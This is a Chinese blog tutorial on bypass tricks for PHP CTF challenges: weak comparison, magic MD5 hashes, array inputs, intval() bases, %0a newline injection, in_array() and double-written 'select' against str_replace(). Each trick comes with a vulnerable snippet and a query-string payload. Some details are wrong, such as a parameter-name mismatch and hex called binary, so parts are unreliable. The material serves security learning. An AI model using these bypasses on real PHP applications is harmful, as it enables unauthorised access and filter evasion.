PHP CTF常见考题的绕过技巧

PHP CTF常见考题的绕过技巧

目录

1.==绕过

2.===绕过

3.intval()函数

4.strpos()函数

 5.in_array()函数

 6.preg_match()函数

 7.str_replace函数


1.==绕过

PHP比较运算符 ==在进行比较的时候是弱类型比较,只需要比较两个值相等就行,不会比较类型

绕过方法如:1=1.0,1=+1、

$a=1;

if($a==$_GET['x']){

    echo $flag;

}

//使用1.0就可以绕过 

if($_GET['name'] != $_GET['password']){

    if(MD5($_GET['name']) == MD5($_GET['password'])){

        echo $flag;

    }

    echo '?';

}

//MD5('QNKCDZO')==MD5('240610708')

//echo MD5('QNKCDZO');

//echo MD5('240610708');


PHP在处理哈希字符串时,会利用”!=””==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0

2.===绕过

PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。只要两边字符串类型不同会返回false

绕过方法:使用数组绕过

if($_GET['name'] != $_GET['password']){

    if(MD5($_GET['name']) == MD5($_GET['password'])){

        echo $flag;

    }

    echo '?';

}

//name[]=1&password[]=2


PHPmd5()函数无法处理数组(会返回NULL

==的也可以用数组绕过

3.intval()函数

intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1(注意这个通常配合preg_match来使用)

语法
int intval ( mixed $var [, int $base = 10 ] )
参数说明:

$var:要转换成 integer 的数量值。
$base:转化所使用的进制。

如果 base为空,通过检测 var 的格式来决定使用的进制:

  • 如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);
  • 否则,如果字符串以 "0" 开始,使用 8 进制(octal);
  • 否则,将使用 10 进制 (decimal)。

绕过方法:通过使用0x或者0开始的格式来绕过不相等的判断(像一些要先判断不相等再判断相等的题目)

$i='666';

$ii=$_GET['n'];

if(intval($ii==$i,0 )){

    echo $flag;

}

//n=0x29a   666的二进制是29a


通过检测 $ii的格式来决定使用的进制

4.strpos()函数

strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。(函数返回查找到这个find字符串的位置,那么如果是0位置,就值得注意了)

注释:strpos() 函数是区分大小写的。

 strpos(string,find,start)

参数 描述
string 必需。规定被搜索的字符串。
find

必需。规定要查找的字符。

start 可选。规定开始搜索的位置

绕过方法:利用换行进行绕过(%0a) 

$i='666';

$ii=$_GET['h'];

if(strpos($ii,$i,"0")){

    echo $flag;

}

//?num=%0a666

 5.in_array()函数

in_array() 函数搜索数组中是否存在指定的值。

bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )
参数 描述
needle 必需。规定要在数组搜索的值。
haystack 必需。规定要搜索的数组。
strict 可选。如果该参数设置为 TRUE,则 in_array() 函数检查搜索的数据与数组的值的类型是否相同。

问题就出在第三个参数,如果第三个参数不设置为true就不检测类型,是弱比较,相当于==号

绕过方法:与==一样 

$whitelist = [1,2,3];

$page=$_GET['i'];

if (in_array($page, $whitelist)) {

    echo "yes";

}

//?i=1ex

 6.preg_match()函数

preg_match 函数用于执行一个正则表达式匹配。

详细用法可以参考:https://www.runoob.com/php/php-preg_match.html

绕过方法:preg_match只能处理字符串,如果不按规定传一个字符串,通常是传一个数组进去,这样就会报错,如果正则不匹配多行(/m)也可用上面的换行方法绕过

if(isset($_GET['num'])){

    $num = $_GET['num'];

    if(preg_match("/[0-9]/", $num)){[t1] 

        die("no no no!");

    }

    if(intval($num)){

        echo $flag;

    }

}

//?num[]=1


上面介绍过了,intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1

 7.str_replace函数

str_replace() 函数用于替换字符串中指定字符(区分大小写)

<?php
echo str_replace("world","Peter","Hello world!");
?>

//输出:Hello Peter!

str_replace(find,replace,string,count)

参数 描述
find 必需。规定要查找的值。
replace 必需。规定替换 find 中的值的值。
string 必需。规定被搜索的字符串。
count 可选。一个变量,对替换数进行计数。

绕过方法:str_replace无法迭代过滤 ,可以通过双写绕过

$sql=$_GET['s'];

$sql=str_replace('select','',$sql);

echo $sql;

?>

//?s=sselectelect

                       

点击阅读全文

上一篇 2023年 5月 28日 am10:28
下一篇 2023年 5月 28日 am10:29